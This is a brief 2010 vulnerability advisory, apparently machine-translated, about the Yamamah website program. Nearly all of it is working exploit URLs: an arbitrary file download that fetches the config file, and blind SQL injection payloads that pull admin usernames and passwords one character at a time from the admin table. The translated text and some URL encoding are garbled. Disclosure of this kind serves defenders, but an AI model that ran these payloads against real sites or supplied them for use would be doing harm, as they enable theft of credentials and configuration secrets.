Yamamah SQL injection and code-disclosure vulnerability-a vulnerability warning-the black bar safety net

2010-06-20T00:00:00
ID MYHACK58:62201027298
Type myhack58
Reporter 佚名
Modified 2010-06-20T00:00:00

Description

Yamamah website program exists SQL injectionwith the any file download code disclosure vulnerability.

Download code disclosure vulnerability: EXP

http://127.0.0.1/yamamah/index.php?download=(file name)

For example: http://server/[variable-path]/index.php?download=includes/config.inc.php

SQL injection: EXp

http://www.hack58.com/yamamah/?news=1[Sql injectionstatement]

Poc: the

http://server/yamamah/?news=1+and substring(@@version,1,1)=5 --> True

http://server/yamamah/?news=1+and substring(@@version,1,1)=4 --> False

http://server/yamamah/?news=1+and%2 0%28select%20substring%28concat%2 8 1,username%29,1,1%2 9%20from%20admin%20limit%200,1%2 9=1

http://server/yamamah/?news=1+and%2 0%28select%20substring%28concat%2 8 1,password%29,1,1%2 9%20from%20admin%20limit%200,1%2 9=1